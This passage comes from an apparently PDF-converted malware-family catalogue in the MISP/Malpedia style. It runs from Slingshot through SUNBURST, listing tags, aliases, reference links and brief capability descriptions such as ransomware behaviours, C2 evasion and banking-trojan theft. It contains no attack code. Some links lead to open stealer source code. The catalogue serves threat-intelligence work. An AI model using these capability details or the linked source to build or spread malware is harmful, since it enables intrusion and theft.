Table 2493. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes
https://www.us-cert.gov/ncas/analysis-reports/ar20-045b

Slingshot

• 2012 first sighted

• Attack vector via compromised Microtik routers where victim’s got infection when they connect to Microtik router admin software - Winbox

• 2018 when discovered by Kaspersky Team

Infection Vector - Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer

The tag is: misp-galaxy:malpedia="Slingshot"

Slingshot is also known as:

Table 2494. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot
https://securelist.com/apt-slingshot/84312/
Sliver

The tag is: misp-galaxy:malpedia="Sliver"

Sliver is also known as:

Table 2495. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver">https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver</a></td>
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<td><a href="https://github.com/BishopFox/sliver">https://github.com/BishopFox/sliver</a></td>
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SlothfulMedia

The tag is: misp-galaxy:malpedia="SlothfulMedia"

SlothfulMedia is also known as:

- QueenOfClubs

Table 2496. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia">https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a</a></td>
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SLUB

The tag is: misp-galaxy:malpedia="SLUB"

SLUB is also known as:

Table 2497. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.slub">https://malpedia.caad.fkie.fraunhofer.de/details/win.slub</a></td>
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<td><a href="https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf">https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf</a></td>
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**smac**

The tag is: `misp-galaxy:malpedia="smac"`

smac is also known as:

- speccom

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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-express">https://www.secureworks.com/research/threat-profiles/bronze-express</a></td>
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**SManager**

The tag is: `misp-galaxy:malpedia="SManager"`

SManager is also known as:

- PhantomNet

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<td><a href="https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4">https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4</a></td>
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<td><a href="https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214">https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214</a></td>
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SmartEyes

The tag is: `misp-galaxy:malpedia="SmartEyes"`

SmartEyes is also known as:

Table 2500. Table References

Links

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes](https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes)
- [https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details](https://www.virustotal.com/gui/file/4eb840617883bf6ed7366242ffee811ad5ea3d5bfd2a589a96d6ee9530690d28/details)

SMAUG Ransomware

The tag is: `misp-galaxy:malpedia="SMAUG Ransomware"`

SMAUG Ransomware is also known as:

Table 2501. Table References

Links

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug](https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug)

SmokeLoader

The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.

The tag is: `misp-galaxy:malpedia="SmokeLoader"`

SmokeLoader is also known as:

- Dofoil
- Sharik
- Smoke
- Smoke Loader
<table>
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<td><a href="https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a">https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a</a></td>
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<td><a href="https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo">https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo</a></td>
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<td><a href="https://research.checkpoint.com/2019-resurgence-of-smokeloader/">https://research.checkpoint.com/2019-resurgence-of-smokeloader/</a></td>
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<td><a href="https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/">https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/">https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/</a></td>
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<td><a href="https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait">https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait</a></td>
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<td><a href="https://hatching.io/blog/tt-2020-08-27/">https://hatching.io/blog/tt-2020-08-27/</a></td>
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<tr>
<td><a href="https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis">https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis</a></td>
</tr>
<tr>
<td><a href="https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/">https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/</a></td>
</tr>
<tr>
<td><a href="http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html">http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html</a></td>
</tr>
<tr>
<td><a href="https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries">https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries</a></td>
</tr>
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Smominru

The tag is: misp-galaxy:malpedia="Smominru"

Smominru is also known as:

- Ismo

Table 2503. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru">https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru</a></td>
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Smrss32 Ransomware

The tag is: misp-galaxy:malpedia="Smrss32 Ransomware"

Smrss32 Ransomware is also known as:

Table 2504. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32">https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32</a></td>
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<tr>
<td><a href="https://www.bleepingcomputer.com/forums/t/623132/">https://www.bleepingcomputer.com/forums/t/623132/</a> smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/</td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=7gCU31ScJgk">https://www.youtube.com/watch?v=7gCU31ScJgk</a></td>
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Sn0wsLogger

The tag is: misp-galaxy:malpedia="Sn0wsLogger"
Snake Ransomware

Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.

The tag is: misp-galaxy:malpedia="Snake Ransomware"

Snake Ransomware is also known as:

- EKANS
- SNAKEHOSE
Snatch

Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.

The tag is: `misp-galaxy:malpedia="Snatch"`

Snatch is also known as:

Table 2507. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch">https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch</a></td>
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<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="https://thedfirreport.com/2020/06/21/snatch-ransomware/">https://thedfirreport.com/2020/06/21/snatch-ransomware/</a></td>
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<tr>
<td><a href="https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md">https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/VK_Intel/status/1191414501297528832">https://twitter.com/VK_Intel/status/1191414501297528832</a></td>
</tr>
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</table>
**SnatchLoader**

A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.

The tag is: `misp-galaxy:malpedia="SnatchLoader"`

SnatchLoader is also known as:

*Table 2508. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader</a></td>
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<tr>
<td><a href="https://www.youtube.com/watch?v=k3sM88o_maM">https://www.youtube.com/watch?v=k3sM88o_maM</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/VK_Intel/status/898549340121288704">https://twitter.com/VK_Intel/status/898549340121288704</a></td>
</tr>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/">https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/</a></td>
</tr>
<tr>
<td><a href="https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/">https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/</a></td>
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</table>

**SNEEPY**

The tag is: `misp-galaxy:malpedia="SNEEPY"`

SNEEPY is also known as:

- ByeByeShell

*Table 2509. Table References*

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**Snifula**

The tag is: `misp-galaxy:malpedia="Snifula"`

Snifula is also known as:

- Ursnif

*Table 2510. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula">https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula</a></td>
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Snojan

The tag is: `misp-galaxy:malpedia="Snojan"`

Snojan is also known as:

Table 2511. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan">https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan</a></td>
</tr>
<tr>
<td><a href="https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9">https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9</a></td>
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SNS Locker

The tag is: `misp-galaxy:malpedia="SNS Locker"`

SNS Locker is also known as:

Table 2512. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker</a></td>
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Sobaken

According to ESET, this RAT was derived from (the open-source) Quasar RAT.

The tag is: `misp-galaxy:malpedia="Sobaken"`

Sobaken is also known as:

Table 2513. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken">https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken</a></td>
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Sobig

The tag is: `misp-galaxy:malpedia="Sobig"`

Sobig is also known as:
• Palyh

Table 2514. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig">https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig</a></td>
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</table>

Socelars

Socelars is an infostealer with main focus on: * Facebook Stealer (ads/manager) * Cookie Stealer | AdsCreditCard {Amazon}

The tag is: misp-galaxy:malpedia="Socelars"

Socelars is also known as:

Table 2515. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars">https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars</a></td>
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<tr>
<td><a href="https://twitter.com/VK_Intel/status/1201584107928653824">https://twitter.com/VK_Intel/status/1201584107928653824</a></td>
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Socks5 Systemz

The tag is: misp-galaxy:malpedia="Socks5 Systemz"

Socks5 Systemz is also known as:

Table 2516. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz">https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz</a></td>
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SocksBot

The tag is: misp-galaxy:malpedia="SocksBot"

SocksBot is also known as:

• BIRDDOG
• Nadrac

Table 2517. Table References
**SodaMaster**

The tag is: `misp-galaxy:malpedia="SodaMaster"`

SodaMaster is also known as:

- DelfsCake
- HEAVYPOT
- dfls

*Table 2518. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster">https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster</a></td>
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**Solarbot**

The tag is: `misp-galaxy:malpedia="Solarbot"`

Solarbot is also known as:

- Napolar

*Table 2519. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot</a></td>
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solarmarker

The tag is: `misp-galaxy:malpedia="solarmarker"`

solarmarker is also known as:

Table 2520. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker">https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/">https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/</a></td>
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SombRAT

The tag is: `misp-galaxy:malpedia="SombRAT"`

SombRAT is also known as:

Table 2521. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat">https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat</a></td>
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Sorano

The tag is: `misp-galaxy:malpedia="Sorano"`

Sorano is also known as:

Table 2522. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano">https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano</a></td>
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<td><a href="https://github.com/3xp0rt/SoranoStealer">https://github.com/3xp0rt/SoranoStealer</a></td>
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<td><a href="https://3xp0rt.xyz/lpmkikVic">https://3xp0rt.xyz/lpmkikVic</a></td>
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<tr>
<td><a href="https://github.com/Alexuiop1337/SoranoStealer">https://github.com/Alexuiop1337/SoranoStealer</a></td>
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soraya

The tag is: `misp-galaxy:malpedia="soraya"`

soraya is also known as:

Table 2523. Table References

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SoreFang

The tag is: misp-galaxy:malpedia="SoreFang"

SoreFang is also known as:

**Table 2524. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang">https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a</a></td>
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Sorgu

The tag is: misp-galaxy:malpedia="Sorgu"

Sorgu is also known as:

**Table 2525. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu">https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east">https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east</a></td>
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SOUNDBITE

The tag is: misp-galaxy:malpedia="SOUNDBITE"

SOUNDBITE is also known as:

- denis

**Table 2526. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite">https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite</a></td>
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<td><a href="https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection">https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection</a></td>
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</tbody>
</table>
**SPACESHIP**

SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system.

The tag is: *misp-galaxy:malpedia=* "SPACESHIP"

SPACESHIP is also known as:

Table 2527. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship">https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship</a></td>
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<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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**Spark**

The tag is: *misp-galaxy:malpedia=* "Spark"

Spark is also known as:

Table 2528. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spark">https://malpedia.caad.fkie.fraunhofer.de/details/win.spark</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/">https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/</a></td>
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Sparkle

The tag is: `misp-galaxy:malpedia="Sparkle"`

Sparkle is also known as:

Table 2529. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle">https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle</a></td>
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Sparksrv

The tag is: `misp-galaxy:malpedia="Sparksrv"`

Sparksrv is also known as:

Table 2530. Table References

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Spartacus

Spartacus is ransomware written in .NET and emerged in the first half of 2018.

The tag is: `misp-galaxy:malpedia="Spartacus"`

Spartacus is also known as:

Table 2531. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus">https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus</a></td>
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Spedear

The tag is: `misp-galaxy:malpedia="Spedear"`

Spedear is also known as:

Table 2532. Table References
Spicy Hot Pot

The tag is: `misp-galaxy:malpedia="Spicy Hot Pot"`

Spicy Hot Pot is also known as:

Table 2533. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear">https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear</a></td>
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<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets">https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets</a></td>
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Spora

The tag is: `misp-galaxy:malpedia="Spora"`

Spora is also known as:

Table 2534. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot">https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/">https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/">https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/</a></td>
</tr>
<tr>
<td><a href="https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas">https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas</a></td>
</tr>
<tr>
<td><a href="https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware">https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware</a></td>
</tr>
<tr>
<td><a href="https://github.com/MinervaLabsResearch/SporaVaccination">https://github.com/MinervaLabsResearch/SporaVaccination</a></td>
</tr>
<tr>
<td><a href="http://malware-traffic-analysis.net/2017/01/17/index2.html">http://malware-traffic-analysis.net/2017/01/17/index2.html</a></td>
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SpyBot

The tag is: `misp-galaxy:malpedia="SpyBot"`

SpyBot is also known as:

Table 2535. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot">https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot</a></td>
</tr>
</tbody>
</table>
SpyEye

SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the "The Next Zeus Malware". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.

The tag is: misp-galaxy:malpedia="SpyEye"

SpyEye is also known as:

Table 2536. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye">https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye</a></td>
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<td><a href="https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393">https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393</a></td>
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<td><a href="https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/">https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/</a></td>
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SquirtDanger

The tag is: misp-galaxy:malpedia="SquirtDanger"

SquirtDanger is also known as:

Table 2537. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger">https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger</a></td>
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**SSHNET**

The tag is: `misp-galaxy:malpedia="SSHNET"

SSHNET is also known as:

Table 2538. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet">https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet</a></td>
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<td><a href="https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices">https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices</a></td>
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<td><a href="https://www.crowdstrike.com/blog/who-is-pioneer-kitten/">https://www.crowdstrike.com/blog/who-is-pioneer-kitten/</a></td>
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**SslMM**

The tag is: `misp-galaxy:malpedia="SslMM"

SslMM is also known as:

Table 2539. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm">https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm</a></td>
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<tr>
<td><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></td>
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<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
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**Stabuniq**

The tag is: `misp-galaxy:malpedia="Stabuniq"

Stabuniq is also known as:

Table 2540. Table References

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<td><a href="http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html">http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html</a></td>
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<td><a href="https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers">https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers</a></td>
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**StalinLocker**

The tag is: misp-galaxy:malpedia="StalinLocker"

StalinLocker is also known as:

- StalinScreamer

*Table 2541. Table References*

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**Stampedo**

The tag is: misp-galaxy:malpedia="Stampedo"

Stampedo is also known as:

*Table 2542. Table References*

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**StarCruft**

The tag is: misp-galaxy:malpedia="StarCruft"

StarCruft is also known as:

*Table 2543. Table References*

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<td><a href="https://securelist.com/operation-daybreak/75100/">https://securelist.com/operation-daybreak/75100/</a></td>
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**StarLoader**

The tag is: misp-galaxy:malpedia="StarLoader"

StarLoader is also known as:

*Table 2544. Table References*
**StarsyPound**

The tag is: `misp-galaxy:malpedia="StarsyPound"`

StarsyPound is also known as:

*Table 2545. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound">https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound</a></td>
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**StartPage**

Potentially unwanted program that changes the startpage of browsers to induce ad impressions.

The tag is: `misp-galaxy:malpedia="StartPage"`

StartPage is also known as:

- Easy Television Access Now

*Table 2546. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage">https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage</a></td>
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**StealthWorker Go**

The tag is: `misp-galaxy:malpedia="StealthWorker Go"`

StealthWorker Go is also known as:

*Table 2547. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker">https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker</a></td>
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StegoLoader

The tag is: \textit{misp-galaxy:malpedia=\textquoteright\textit{StegoLoader}\textquoteright}\textit{''}

StegoLoader is also known as:

\textit{Table 2548. Table References}

\begin{tabular}{|l|}
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\textbf{Links} \\
\hline
https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader  \\
https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer  \\
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\end{tabular}

Stinger

The tag is: \textit{misp-galaxy:malpedia=\textquoteright\textit{Stinger}\textquoteright}\textit{''}

Stinger is also known as:

\textit{Table 2549. Table References}

\begin{tabular}{|l|}
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\hline
https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger  \\
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\end{tabular}

StoneDrill

The tag is: \textit{misp-galaxy:malpedia=\textquoteright\textit{StoneDrill}\textquoteright}\textit{''}

StoneDrill is also known as:

\textit{Table 2550. Table References}

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\textbf{Links} \\
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https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill  \\
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage  \\
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf  \\
\hline
\end{tabular}
STOP Ransomware

STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.

The tag is: *misp-galaxy:malpedia=* "STOP Ransomware"

STOP Ransomware is also known as:

- Djvu
- KeyPass

Table 2551. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stop">https://malpedia.caad.fkie.fraunhofer.de/details/win.stop</a></td>
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<td><a href="https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a">https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a</a></td>
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<tr>
<td><a href="https://securelist.com/keypass-ransomware/87412/">https://securelist.com/keypass-ransomware/87412/</a></td>
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Stration

The tag is: *misp-galaxy:malpedia=* "Stration"

Stration is also known as:

Table 2552. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stration">https://malpedia.caad.fkie.fraunhofer.de/details/win.stration</a></td>
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Stresspaint

The tag is: *misp-galaxy:malpedia=* "Stresspaint"
Stresspaint is also known as:

Table 2553. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint">https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint</a></td>
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<td><a href="https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/">https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/</a></td>
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**StrongPity**

The tag is: *misp-galaxy:malpedia=*"StrongPity"*

StrongPity is also known as:

Table 2554. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity">https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity</a></td>
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<tr>
<td><a href="https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4">https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4</a></td>
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<td><a href="https://twitter.com/physicaldrive0/status/786293008278970368">https://twitter.com/physicaldrive0/status/786293008278970368</a></td>
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<td><a href="https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/">https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/</a></td>
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<td><a href="https://mp.weixin.qq.com/s/5No0TR4ECVIp_Xv4joXEBg">https://mp.weixin.qq.com/s/5No0TR4ECVIp_Xv4joXEBg</a></td>
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**Stuxnet**

The tag is: *misp-galaxy:malpedia=*"Stuxnet"
### Stuxnet

Stuxnet is also known as:

**Table 2555. Table References**

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<td><a href="https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihr-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147">https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihr-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147</a></td>
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<td><a href="http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html">http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html</a></td>
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### SUCEFUL

**SUCEFUL**

The tag is: *misp-galaxy:malpedia*="SUCEFUL"

SUCEFUL is also known as:

**Table 2556. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful">https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html">https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html</a></td>
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</tbody>
</table>
FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanized updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.

